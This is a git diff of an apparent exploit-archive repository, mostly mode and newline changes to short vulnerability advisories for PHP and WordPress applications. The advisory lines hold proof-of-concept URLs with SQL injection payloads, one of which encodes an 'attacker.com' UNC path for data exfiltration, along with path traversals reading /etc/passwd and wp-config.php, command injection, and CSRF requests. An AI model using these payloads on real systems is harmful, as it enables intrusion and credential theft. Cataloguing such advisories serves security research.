+http://www.example.com/modules/glossaire/glossaire-aff.php?lettre=A[SQL INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/39189.txt b/platforms/php/webapps/39189.txt old mode 100755 new mode 100644 index 698bb6c34..6b6ea98c1 --- a/platforms/php/webapps/39189.txt +++ b/platforms/php/webapps/39189.txt @@ -4,4 +4,4 @@ SMART iPBX is prone to multiple SQL-injection vulnerabilities because it fails t Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/editarclave.php?accion=e&id=[SQL INJECTION]]&ld=1 \ No newline at end of file +http://www.example.com/editarclave.php?accion=e&id=[SQL INJECTION]]&ld=1 \ No newline at end of file diff --git a/platforms/php/webapps/3919.txt b/platforms/php/webapps/3919.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39190.php b/platforms/php/webapps/39190.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39191.txt b/platforms/php/webapps/39191.txt old mode 100755 new mode 100644 index 63b51e423..c9790c56d --- a/platforms/php/webapps/39191.txt +++ b/platforms/php/webapps/39191.txt @@ -4,4 +4,4 @@ Clipperz Password Manager is prone to remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the affected application. -http://www.example.com/password-manager-master/backend/php/src/setup/rpc.php?objectname=Xmenu();print_r(php_uname());die \ No newline at end of file +http://www.example.com/password-manager-master/backend/php/src/setup/rpc.php?objectname=Xmenu();print_r(php_uname());die \ No newline at end of file diff --git a/platforms/php/webapps/39197.txt b/platforms/php/webapps/39197.txt old mode 100755 new mode 100644 index 3931cff57..079bc7970 --- a/platforms/php/webapps/39197.txt +++ b/platforms/php/webapps/39197.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Versions prior to Booking System (Booking Calendar) 1.3 are vulnerable. -www.example.com/wp/wp-admin/admin-ajax.php?action=dopbs_show_booking_form_fields&booking_form_id=[SQLi] \ No newline at end of file +www.example.com/wp/wp-admin/admin-ajax.php?action=dopbs_show_booking_form_fields&booking_form_id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/39198.html b/platforms/php/webapps/39198.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3920.txt b/platforms/php/webapps/3920.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39200.txt b/platforms/php/webapps/39200.txt old mode 100755 new mode 100644 index 60d86978b..c74c4e605 --- a/platforms/php/webapps/39200.txt +++ b/platforms/php/webapps/39200.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to compromise the application, access or modi PHP-Nuke 8.3 is vulnerable; other versions may also be affected. -http://www.example.com/modules.php?name=Submit_News&subject=whatever&topics[]=[SQLi] \ No newline at end of file +http://www.example.com/modules.php?name=Submit_News&subject=whatever&topics[]=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/39202.txt b/platforms/php/webapps/39202.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39206.txt b/platforms/php/webapps/39206.txt old mode 100755 new mode 100644 index 4ef5f8842..ff8cbf08b --- a/platforms/php/webapps/39206.txt +++ b/platforms/php/webapps/39206.txt @@ -6,4 +6,4 @@ A successful exploit will allow an attacker to compromise the application, acces webEdition CMS 6.3.3.0 through 6.3.8.0 svn6985 are vulnerable; other versions may also be affected. - http://www.example.com/webEdition/we_fs.php?what=4[SQL] \ No newline at end of file + http://www.example.com/webEdition/we_fs.php?what=4[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/39210.txt b/platforms/php/webapps/39210.txt old mode 100755 new mode 100644 index c4636478b..05b29fd97 --- a/platforms/php/webapps/39210.txt +++ b/platforms/php/webapps/39210.txt @@ -6,4 +6,4 @@ Remote attackers can use a specially crafted request with directory-traversal se Seo Panel 3.4.0 is vulnerable; other versions may also be affected. -http://www.example.com/seopanel/download.php?file=/etc/purple/prefs.xml \ No newline at end of file +http://www.example.com/seopanel/download.php?file=/etc/purple/prefs.xml \ No newline at end of file diff --git a/platforms/php/webapps/39211.txt b/platforms/php/webapps/39211.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39212.txt b/platforms/php/webapps/39212.txt old mode 100755 new mode 100644 index 686c0023c..8d8e7ae8b --- a/platforms/php/webapps/39212.txt +++ b/platforms/php/webapps/39212.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow a remote attacker to perform certain unauthorize JW Player for Flash & HTML5 Video 2.1.3 is vulnerable; other versions may also be affected. -http://www.example.com/wp-admin/admin.php?page=jwp6_menu&player_id=1&action=delete \ No newline at end of file +http://www.example.com/wp-admin/admin.php?page=jwp6_menu&player_id=1&action=delete \ No newline at end of file diff --git a/platforms/php/webapps/39213.txt b/platforms/php/webapps/39213.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39223.txt b/platforms/php/webapps/39223.txt old mode 100755 new mode 100644 index 4b9ce1dea..bc4d08f1e --- a/platforms/php/webapps/39223.txt +++ b/platforms/php/webapps/39223.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc ZeusCart 4.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?do=addtocart&prodid=${PROD_ID} and sleep(1) \ No newline at end of file +http://www.example.com/index.php?do=addtocart&prodid=${PROD_ID} and sleep(1) \ No newline at end of file diff --git a/platforms/php/webapps/3923.txt b/platforms/php/webapps/3923.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39237.txt b/platforms/php/webapps/39237.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39238.txt b/platforms/php/webapps/39238.txt old mode 100755 new mode 100644 index cdb4a33b8..150f47f0b --- a/platforms/php/webapps/39238.txt +++ b/platforms/php/webapps/39238.txt @@ -4,4 +4,4 @@ AtomCMS is prone to an SQL-injection vulnerability and an arbitrary file-upload Exploiting these issues could allow an attacker to upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/acms/admin/uploads.php?id=1 \ No newline at end of file +http://www.example.com/acms/admin/uploads.php?id=1 \ No newline at end of file diff --git a/platforms/php/webapps/39239.txt b/platforms/php/webapps/39239.txt old mode 100755 new mode 100644 index 80da5211c..778f615e3 --- a/platforms/php/webapps/39239.txt +++ b/platforms/php/webapps/39239.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc xClassified 1.2 is vulnerable; other versions may also be affected. -http://www.example.com/ads.php?catid=4%27a[SQLi] \ No newline at end of file +http://www.example.com/ads.php?catid=4%27a[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/3924.txt b/platforms/php/webapps/3924.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39240.txt b/platforms/php/webapps/39240.txt old mode 100755 new mode 100644 index 19bdfb787..b1b2d9292 --- a/platforms/php/webapps/39240.txt +++ b/platforms/php/webapps/39240.txt @@ -8,4 +8,4 @@ BSK PDF Manager 1.3.2 is vulnerable; other versions may also be affected. http://www.example.com/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2 -http://www.example.com/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2 \ No newline at end of file +http://www.example.com/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2 \ No newline at end of file diff --git a/platforms/php/webapps/39243.txt b/platforms/php/webapps/39243.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39245.txt b/platforms/php/webapps/39245.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39246.txt b/platforms/php/webapps/39246.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39249.txt b/platforms/php/webapps/39249.txt old mode 100755 new mode 100644 index 4de0ffd09..531ea405d --- a/platforms/php/webapps/39249.txt +++ b/platforms/php/webapps/39249.txt @@ -65,4 +65,4 @@ http://www.example.com/WeBid/loader.php?js=js/jquery.js;js/jquery.lightbox.js; PoC http://www.example.com/WeBid/viewhelp.php?cat=[LDAP] -Replace cat= as 1,2,3,4 \ No newline at end of file +Replace cat= as 1,2,3,4 \ No newline at end of file diff --git a/platforms/php/webapps/39250.txt b/platforms/php/webapps/39250.txt old mode 100755 new mode 100644 index a00705321..ba76424cd --- a/platforms/php/webapps/39250.txt +++ b/platforms/php/webapps/39250.txt @@ -14,4 +14,4 @@ http://www.example.com/wp-content/plugins/dzs-videogallery/deploy/designer/previ Command-Injection: -http://www.example.com/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://www.example.com/1.jpg$(os-cmd) \ No newline at end of file +http://www.example.com/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://www.example.com/1.jpg$(os-cmd) \ No newline at end of file diff --git a/platforms/php/webapps/39251.txt b/platforms/php/webapps/39251.txt old mode 100755 new mode 100644 index 6ad2684d9..9f75c9378 --- a/platforms/php/webapps/39251.txt +++ b/platforms/php/webapps/39251.txt @@ -8,4 +8,4 @@ BookX plugin 1.7 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/bookx/includes/bookx_export.php?file=../../../../../../../../etc/passwd -http://www.example.com/wp-content/plugins/bookx/includes/bookx_export.php?file=../../../../wp-config.php \ No newline at end of file +http://www.example.com/wp-content/plugins/bookx/includes/bookx_export.php?file=../../../../wp-config.php \ No newline at end of file diff --git a/platforms/php/webapps/39252.txt b/platforms/php/webapps/39252.txt old mode 100755 new mode 100644 index bfaf7f3c9..08442d5b1 --- a/platforms/php/webapps/39252.txt +++ b/platforms/php/webapps/39252.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to compromise the application, access or modi WP Rss Poster 1.0.0 is vulnerable; other versions may also be affected. -http://www.example.com/wp-admin/admin.php?page=wrp-add-new&id=2 union select 1,user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18 \ No newline at end of file +http://www.example.com/wp-admin/admin.php?page=wrp-add-new&id=2 union select 1,user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18 \ No newline at end of file diff --git a/platforms/php/webapps/39253.txt b/platforms/php/webapps/39253.txt old mode 100755 new mode 100644 index b0384df3f..d674a28fe --- a/platforms/php/webapps/39253.txt +++ b/platforms/php/webapps/39253.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to compromise the application, access or modi ENL Newsletter 1.0.1 is vulnerable; other versions may also be affected. -http://www.example.com/wp-admin/admin.php?page=enl-add-new&id=2 union select 1,@@version,3,user(),database(),6,7,8,9,0,1 \ No newline at end of file +http://www.example.com/wp-admin/admin.php?page=enl-add-new&id=2 union select 1,@@version,3,user(),database(),6,7,8,9,0,1 \ No newline at end of file diff --git a/platforms/php/webapps/39254.html b/platforms/php/webapps/39254.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39255.html b/platforms/php/webapps/39255.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39256.txt b/platforms/php/webapps/39256.txt old mode 100755 new mode 100644 index 0b55ed8d3..d54939c12 --- a/platforms/php/webapps/39256.txt +++ b/platforms/php/webapps/39256.txt @@ -7,4 +7,4 @@ An attacker can exploit these issues to obtain potentially sensitive information Tera Charts 0.1 is vulnerable; other versions may also be affected. http://www.example.com/wordpress_vuln_check/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../../etc/passwd -http://www.example.com/wordpress_vuln_check/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../../etc/passwd \ No newline at end of file +http://www.example.com/wordpress_vuln_check/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/39257.txt b/platforms/php/webapps/39257.txt old mode 100755 new mode 100644 index 25e464ce3..084a23450 --- a/platforms/php/webapps/39257.txt +++ b/platforms/php/webapps/39257.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to obtain potentially sensitive information Tera Charts 0.1 is vulnerable; other versions may also be affected. -http://www.example.com/wp_test/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd \ No newline at end of file +http://www.example.com/wp_test/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/39261.txt b/platforms/php/webapps/39261.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39262.txt b/platforms/php/webapps/39262.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39263.txt b/platforms/php/webapps/39263.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39266.txt b/platforms/php/webapps/39266.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39267.html b/platforms/php/webapps/39267.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39268.java b/platforms/php/webapps/39268.java old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39269.txt b/platforms/php/webapps/39269.txt old mode 100755 new mode 100644 index 277972b87..7f884e72e --- a/platforms/php/webapps/39269.txt +++ b/platforms/php/webapps/39269.txt @@ -4,4 +4,4 @@ The Lead Octopus Power plugin for WordPress is prone to an SQL-injection vulnera A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php?id=[SQL] \ No newline at end of file +http://www.example.com/wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/39270.txt b/platforms/php/webapps/39270.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39271.txt b/platforms/php/webapps/39271.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39272.txt b/platforms/php/webapps/39272.txt old mode 100755 new mode 100644 index 991afe0f3..031619ac5 --- a/platforms/php/webapps/39272.txt +++ b/platforms/php/webapps/39272.txt @@ -26,5 +26,4 @@ also embedded These files : CMSimple/2site/index.php CMSimple/cmsimple/cms.php CMSimple/index.php - CMSimple/plugins/index.php - \ No newline at end of file + CMSimple/plugins/index.php \ No newline at end of file diff --git a/platforms/php/webapps/39273.txt b/platforms/php/webapps/39273.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39279.txt b/platforms/php/webapps/39279.txt old mode 100755 new mode 100644 index b8ba54041..b0d522574 --- a/platforms/php/webapps/39279.txt +++ b/platforms/php/webapps/39279.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to compromise the application, access or modi wpSS 0.62 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4# \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4# \ No newline at end of file diff --git a/platforms/php/webapps/3928.txt b/platforms/php/webapps/3928.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39280.txt b/platforms/php/webapps/39280.txt old mode 100755 new mode 100644 index 7c43a32dc..0078b337a --- a/platforms/php/webapps/39280.txt +++ b/platforms/php/webapps/39280.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to compromise the application, access or modi HDW Player 2.4.2 is vulnerable; other versions may also be affected. -http://www.example.com/wp-admin/admin.php?page=videos&opt=edit&id=2 union select 1,2,user(),4,5,6,database(),8,@@version,10,11,12 \ No newline at end of file +http://www.example.com/wp-admin/admin.php?page=videos&opt=edit&id=2 union select 1,2,user(),4,5,6,database(),8,@@version,10,11,12 \ No newline at end of file diff --git a/platforms/php/webapps/39281.txt b/platforms/php/webapps/39281.txt old mode 100755 new mode 100644 index 5065f2752..82b9822b9 --- a/platforms/php/webapps/39281.txt +++ b/platforms/php/webapps/39281.txt @@ -4,4 +4,4 @@ VoipSwitch is prone to a local file-include vulnerability because it fails to su An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. -https://www.example.com/user.php?action=../../../windows/win.ini%00.jpg \ No newline at end of file +https://www.example.com/user.php?action=../../../windows/win.ini%00.jpg \ No newline at end of file diff --git a/platforms/php/webapps/39282.txt b/platforms/php/webapps/39282.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39283.txt b/platforms/php/webapps/39283.txt old mode 100755 new mode 100644 index 942cba802..dec64d499 --- a/platforms/php/webapps/39283.txt +++ b/platforms/php/webapps/39283.txt @@ -4,4 +4,4 @@ FB Gorilla plugin for WordPress is prone to an SQL-injection vulnerability becau An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users-- \ No newline at end of file +http://www.example.com/wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users-- \ No newline at end of file diff --git a/platforms/php/webapps/39287.txt b/platforms/php/webapps/39287.txt old mode 100755 new mode 100644 index fd082d3d0..3827ae6ad --- a/platforms/php/webapps/39287.txt +++ b/platforms/php/webapps/39287.txt @@ -6,4 +6,4 @@ Exploiting this issue can allow an attacker to obtain sensitive information that WP Content Source Control 3.0.0 is vulnerable; other versions may also be affected. -www.example.com/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php \ No newline at end of file +www.example.com/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php \ No newline at end of file diff --git a/platforms/php/webapps/39289.txt b/platforms/php/webapps/39289.txt old mode 100755 new mode 100644 index 8e07d4629..a461e0e0c --- a/platforms/php/webapps/39289.txt +++ b/platforms/php/webapps/39289.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access ArticleFR 3.0.4 is vulnerable; prior versions may also be affected. -http://www.example.com/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHA R(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(1 11),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202 \ No newline at end of file +http://www.example.com/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHA R(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(1 11),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202 \ No newline at end of file diff --git a/platforms/php/webapps/39290.txt b/platforms/php/webapps/39290.txt old mode 100755 new mode 100644 index aea9f5a08..a494222a8 --- a/platforms/php/webapps/39290.txt +++ b/platforms/php/webapps/39290.txt @@ -7,4 +7,4 @@ An attacker may exploit this issue to perform certain unauthorized actions. This Versions prior to MyAwards 2.4 are vulnerable. https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2 -https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1 \ No newline at end of file +https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1 \ No newline at end of file diff --git a/platforms/php/webapps/39291.txt b/platforms/php/webapps/39291.txt old mode 100755 new mode 100644 index a08b50a3c..3f48438d5 --- a/platforms/php/webapps/39291.txt +++ b/platforms/php/webapps/39291.txt @@ -4,4 +4,4 @@ The KenBurner Slider plugin for WordPress is prone to an arbitrary file-download An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. -http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php \ No newline at end of file +http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php \ No newline at end of file diff --git a/platforms/php/webapps/39294.txt b/platforms/php/webapps/39294.txt old mode 100755 new mode 100644 index 2bcc64f74..614fc360a --- a/platforms/php/webapps/39294.txt +++ b/platforms/php/webapps/39294.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to compromise the application, access or mod Spider Video Player Extension 2.8.3 is vulnerable; other versions may also be affected. -http://www.example.com/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1' \ No newline at end of file +http://www.example.com/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1' \ No newline at end of file diff --git a/platforms/php/webapps/39296.txt b/platforms/php/webapps/39296.txt old mode 100755 new mode 100644 index f7ccf5253..35043ef4b --- a/platforms/php/webapps/39296.txt +++ b/platforms/php/webapps/39296.txt @@ -4,4 +4,4 @@ Urban City theme for Wordpress is prone to an arbitrary file-download vulnerabil An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. -http://www.example.com/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd \ No newline at end of file +http://www.example.com/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/39297.txt b/platforms/php/webapps/39297.txt old mode 100755 new mode 100644 index ff334e996..c2aab95b9 --- a/platforms/php/webapps/39297.txt +++ b/platforms/php/webapps/39297.txt @@ -4,4 +4,4 @@ Authentic theme for Wordpress is prone to an arbitrary file-download vulnerabili An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. -http://www.example.com/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php \ No newline at end of file +http://www.example.com/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php \ No newline at end of file diff --git a/platforms/php/webapps/39298.txt b/platforms/php/webapps/39298.txt old mode 100755 new mode 100644 index 7fd956bff..5419d4e5d --- a/platforms/php/webapps/39298.txt +++ b/platforms/php/webapps/39298.txt @@ -4,4 +4,4 @@ Epic theme for Wordpress is prone to an arbitrary file-download vulnerability. An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. -http://www.example.com/wp-content/themes/epic/includes/download.php?file=/home/content/46/8992446/html/wp-config.php \ No newline at end of file +http://www.example.com/wp-content/themes/epic/includes/download.php?file=/home/content/46/8992446/html/wp-config.php \ No newline at end of file diff --git a/platforms/php/webapps/39299.txt b/platforms/php/webapps/39299.txt old mode 100755 new mode 100644 index e8ac5af5c..b59d58b41 --- a/platforms/php/webapps/39299.txt +++ b/platforms/php/webapps/39299.txt @@ -4,4 +4,4 @@ Antioch theme for Wordpress is prone to an arbitrary file-download vulnerability An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. -http://www.example.com/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php \ No newline at end of file +http://www.example.com/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php \ No newline at end of file diff --git a/platforms/php/webapps/39300.txt b/platforms/php/webapps/39300.txt old mode 100755 new mode 100644 index 6fd8d1bdf..c3b3d315e --- a/platforms/php/webapps/39300.txt +++ b/platforms/php/webapps/39300.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Spider Facebook 1.0.8 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 and 1=2 \ No newline at end of file +http://www.example.com/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 and 1=2 \ No newline at end of file diff --git a/platforms/php/webapps/39301.html b/platforms/php/webapps/39301.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39302.html b/platforms/php/webapps/39302.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39303.txt b/platforms/php/webapps/39303.txt old mode 100755 new mode 100644 index 4617c21f9..0a1e11f8c --- a/platforms/php/webapps/39303.txt +++ b/platforms/php/webapps/39303.txt @@ -6,4 +6,4 @@ An attacker can exploit the cross-site request forgery issue to perform unauthor Xhanch My Twitter 2.7.7 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/?xmt_Primary_twt_id=508351521810300928 \ No newline at end of file +http://www.example.com/wordpress/?xmt_Primary_twt_id=508351521810300928 \ No newline at end of file diff --git a/platforms/php/webapps/39304.txt b/platforms/php/webapps/39304.txt old mode 100755 new mode 100644 index 524973ed5..4acf1de6f --- a/platforms/php/webapps/39304.txt +++ b/platforms/php/webapps/39304.txt @@ -6,4 +6,4 @@ An attacker can exploit the cross-site request forgery issue to perform unauthor W3 Total Cache 0.9.4 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-admin/admin.php?page=w3tc_general&w3tc_note=enabled_edge \ No newline at end of file +http://www.example.com/wordpress/wp-admin/admin.php?page=w3tc_general&w3tc_note=enabled_edge \ No newline at end of file diff --git a/platforms/php/webapps/39306.html b/platforms/php/webapps/39306.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39309.txt b/platforms/php/webapps/39309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3931.htm b/platforms/php/webapps/3931.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39313.txt b/platforms/php/webapps/39313.txt old mode 100755 new mode 100644 index df644df72..b9f552429 --- a/platforms/php/webapps/39313.txt +++ b/platforms/php/webapps/39313.txt @@ -6,4 +6,4 @@ An attacker can exploit the cross-site request forgery issue to perform unauthor Food Order Portal 8.3 is vulnerable; other versions may also be affected. -http://www.example.com/admin/admin_user_delete.php?admin_id=[ADMIN ID] \ No newline at end of file +http://www.example.com/admin/admin_user_delete.php?admin_id=[ADMIN ID] \ No newline at end of file diff --git a/platforms/php/webapps/39317.txt b/platforms/php/webapps/39317.txt old mode 100755 new mode 100644 index e61b9ace7..b76931b24 --- a/platforms/php/webapps/39317.txt +++ b/platforms/php/webapps/39317.txt @@ -9,4 +9,4 @@ Successful exploits of these issues allow the attacker-supplied HTML and script Wordfence Security Plugin 5.2.3 is vulnerable; other versions may also be affected -http://www.example.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php \ No newline at end of file +http://www.example.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php \ No newline at end of file diff --git a/platforms/php/webapps/39319.txt b/platforms/php/webapps/39319.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39320.txt b/platforms/php/webapps/39320.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39332.txt b/platforms/php/webapps/39332.txt old mode 100755 new mode 100644 index 8ea60a5e0..001dd97b1 --- a/platforms/php/webapps/39332.txt +++ b/platforms/php/webapps/39332.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to download backup files that contain sensiti Wiser 2.10 is vulnerable; other versions may also be affected. -http://www.example.com/voip/sipserver/class/baixarBackup.php \ No newline at end of file +http://www.example.com/voip/sipserver/class/baixarBackup.php \ No newline at end of file diff --git a/platforms/php/webapps/39333.html b/platforms/php/webapps/39333.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39339.txt b/platforms/php/webapps/39339.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39341.txt b/platforms/php/webapps/39341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39342.txt b/platforms/php/webapps/39342.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39343.txt b/platforms/php/webapps/39343.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39344.txt b/platforms/php/webapps/39344.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39345.txt b/platforms/php/webapps/39345.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39346.txt b/platforms/php/webapps/39346.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39347.txt b/platforms/php/webapps/39347.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39348.txt b/platforms/php/webapps/39348.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39349.txt b/platforms/php/webapps/39349.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3935.txt b/platforms/php/webapps/3935.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39350.txt b/platforms/php/webapps/39350.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39351.txt b/platforms/php/webapps/39351.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39352.txt b/platforms/php/webapps/39352.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39355.txt b/platforms/php/webapps/39355.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39384.txt b/platforms/php/webapps/39384.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39385.txt b/platforms/php/webapps/39385.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39386.txt b/platforms/php/webapps/39386.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39404.txt b/platforms/php/webapps/39404.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3941.txt b/platforms/php/webapps/3941.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39410.txt b/platforms/php/webapps/39410.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39411.txt b/platforms/php/webapps/39411.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39413.txt b/platforms/php/webapps/39413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39414.txt b/platforms/php/webapps/39414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39415.txt b/platforms/php/webapps/39415.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39416.txt 